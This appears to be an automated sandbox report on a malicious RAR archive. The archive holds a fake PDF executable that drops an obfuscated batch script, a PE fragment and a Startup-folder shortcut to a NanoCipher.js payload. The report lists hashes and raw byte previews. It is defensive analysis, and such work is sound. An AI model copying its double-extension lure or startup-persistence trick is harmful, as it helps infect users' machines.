    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:modified
    Size (bytes):51200
    Entropy (8bit):7.996708631018947
    Encrypted:true
    SSDEEP:
    MD5:BDAD8A1F1980AC434AF0C3D0B92F8743
    SHA1:63B20AD7AADE68D1F0BF51085044FBF91A209323
    SHA-256:4B9785E33AB65B14ABD3167EFBBF6DB248B3E36B30A32FDB0105AC29FF51615E
    SHA-512:E515A5E58ECD18B089B52AF3E8ADE5DE97474736DFCA896FD5C1043C79347916FC2CFA53B658B058833D0F9E1B8D542BA8F56D749B318399A71E6034CE282194
    Malicious:false
    Reputation:unknown
    Preview:..".".......}.......a.........(..4D.wU_;....F...3....;...m.=...[.F...m..X^U^...I...B..8.J..KC.h..jY........6....f.. w\.%.YZK...Qg.p..2Y:8p_.]5...Dv6.A.g.zR..iw.wI..n..1q..}).4.b.....R.U..}r.7...s.....-#:.....e..........m+....l./n....Y...... R....H.d..f.;.......k.}*..H..J.g|...6..F....R...i.7..E7.f.R...n..O.....o......:r......B.3b..f..d1H{...5..*...............M....xB.' . .r.5..Ded.m...K.!\T..|...dt.v..i...B...K..7.'..+.F.......5.Js.H..q..m..............q.s'.tCk*3..e...IQ..E....?..|{.6...'.w.w..a....H..aM...w..^I..a...&.).F..."s7..P.....e.Z...e..X@W(.-...o.5'/x.......;..A`^..Cj..}.?.s3...s..P_..o...M>.f....N..Y.,..{C.F.].7.Y.g..;...g.$pu......t......Bb....Y.U.(#...S-3.~..4..Yz.!..4.A5Y/..j.4....d..#.......Y\Syu...E.........m....F..n.U.2P..g.....,({..o......d. ..s.f..Q.T.....n8V ........*...J..._.o.N..T....q._].U[ndvKy.......%.....m.|3......2i....5<.\wN...h.3....-......0]N.Y....|...`...".8..fI#.ww...y:~>..`.Z....^....h....Xv6c.9..3U..

    C:\Users\user\AppData\Local\Temp\Tim

    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):886916
    Entropy (8bit):6.622152202054227
    Encrypted:false
    SSDEEP:
    MD5:3E017BD65EDFF0C040B35106A5C834AB
    SHA1:13A2011D56607D8315A96D3FE649D94B5C92535B
    SHA-256:961732D6B3C27D17BE771FC4347FD0B7C8D7A86F2FF9A3A6447553927E56E447
    SHA-512:B163879943E2778A2D682815DEA2FA15523CAB3F364E244CD6E508E6C99D1CB4BC466796443962E959BDA7EEDFCC3578218CA2DFF382485C632D55009B7BF671
    Malicious:false
    Reputation:unknown
    Preview:...j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91

    C:\Users\user\AppData\Local\Temp\Tournaments

    Download File
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):6725
    Entropy (8bit):6.182223398021148
    Encrypted:false
    SSDEEP:
    MD5:E705FAE954799FD7B4782DC9FFA24252
    SHA1:03BEDEB38DF07BC6C99A7EA031DDC070A929F8FA
    SHA-256:D33FEA9A49EB3992712B778354C6CD3D295914F4A8A8233AB6EE40DD6658F4D7
    SHA-512:4585A7959D13D2E5AAE9C054CED4FD76AF9B6CA3191E2E95983F324255D18D2D8F130574D2DF81E0D457B1BDCB2ED1F782A344FF8F0ED850726131F3200EB119
    Malicious:false
    Reputation:unknown
    Preview:venezuelalandscapesmeantposters..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...............................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\Yes.bat

    Download File
    Process:C:\Windows\SysWOW64\cmd.exe
    File Type:ASCII text, with very long lines (579), with CRLF line terminators
    Category:dropped
    Size (bytes):14057
    Entropy (8bit):5.1259091890276025
    Encrypted:false
    SSDEEP:
    MD5:06A9A6DC642BD8A1484F766845040DDF
    SHA1:A187C475793221D9A6B1591F0D9EF1F63E98E356
    SHA-256:C3C049F72B5BCDE6CC340DA0DE09FC83DA25D29EB967DC55F40D7F54514672D7
    SHA-512:D8E28ECD387C128F1B4E871E0BC5F89D23866D1645B1DA4A6A090F122EB76B3E99C8CA76B3C3B7DB0FDE36515069965BF79A1B67114ACE7AD4CEA2D9265D0CEB
    Malicious:false
    Reputation:unknown
    Preview:Set Uses=V..XPAmateur-Refined-Alternatively-Census-Mail-Participate-Edwards-Jamaica-North-..BiEgg-Subaru-Facing-Developers-Gt-Honor-..gVgDiversity-Greene-Organ-Increases-Exempt-Gnu-Particles-Details-..VWExplorer-Tamil-..IPoSimply-Liberty-Races-Fares-Moss-Express-Monitors-..GBzBulgarian-Infectious-Cock-Tablet-Cattle-Adolescent-..okAgRehab-..KqzRolling-..Set Choosing= ..dmBDLands-Compatibility-Senegal-Adjustment-Retention-..ivAsMonaco-Easy-Banned-..DEwSacred-Renaissance-Delta-Possess-Budgets-Es-Acoustic-..ujGeo-Meal-Greece-Sleeps-..ycJVBikini-Vote-Dividend-Wheels-Preview-Dirty-Modified-Children-Affordable-..LnSectors-Prove-Dip-Lauderdale-Porno-Proposed-Reproduced-Skype-..lrProhibited-Committee-Intervals-Deviant-Institution-Cholesterol-Til-Bitch-Promoting-..OYKvHurt-..Set Corp=7..DgnjSmoke-Fortune-Zoophilia-Habitat-Sail-..krDSArbitrary-Discussing-Corn-Duo-Americas-Alot-Brussels-Practice-Handmade-..XyhRFundamental-Looks-Anne-Sharp-Venezuela-Abuse-Seattle-..XRQnTracker-Pirates-Acdbentity-Se

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url

    Download File
    Process:C:\Windows\SysWOW64\cmd.exe
    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >), ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):96
    Entropy (8bit):4.808986726283046
    Encrypted:false
    SSDEEP:
    MD5:15BE55EECED96D4F46AA9E8C6BE96E56
    SHA1:34D46D42725D25F68C30A57CADC897AF8FEED121
    SHA-256:68001C41093159918D7D5D8C6F0ED461527F7DED297376911C4A7DA8982007FB
    SHA-512:5106C2F46D0BEEC5B3E7B17C4C114F814D5EB6A489039594024A3D6F2FD03F612245C686FDD562667E85232C5E20D029E167CFAB6439EF0F8E869DBB62FABA7E
    Malicious:true
    Reputation:unknown
    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" ..

    Static File Info

    General

    File type:RAR archive data, v5
    Entropy (8bit):7.9998113191783515
    TrID:
    • RAR Archive (5005/1) 100.00%
    File name:#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar
    File size:1'010'278 bytes
    MD5:f46e12150b7b0e381c3cf871325eed8e
    SHA1:57d88bcbf4f6804cdaea6b9c06e0a2a204ec4a6a
    SHA256:35d6eab4f66ce38c0a8953b5fcb3b03bf9f042ca4a4ef8f0555ebabe39ac18f8
    SHA512:b76dc0f752443f751fdc55d5743f63baa97404bde12ec655ca52477a3f8b5f582a98fa362840fb1d624f955663bebb8735c573705c079d1aafb8c73b8f2bd4b1
    SSDEEP:24576:P5g167y+rl6d68YVdLpeRGOKIlwu2Q3crnO+Pt:t7y+lgCL2wuN3crntPt
    TLSH:E8253368CF568848CCAC99F4BB5A9F1CB3228E854545CE0FE611D8D47C4A3473D6FA1B
    File Content Preview:Rar!......I..............]...Q........ .N5c...5.......... ....../...... .............. 937463543.txt......Wq+....q654$.`C.r..wV.{. .q.G....B.T.=0.r(.NI...m.o.xR4J.0.....^...30..R...2.K...#&x..+...]~.*-W.jEs.O.....p.!.nm.[./m..@P.e.E.....=...= .l.c...'....

    File Icon

    Icon Hash:72e2a2a292a2a2b2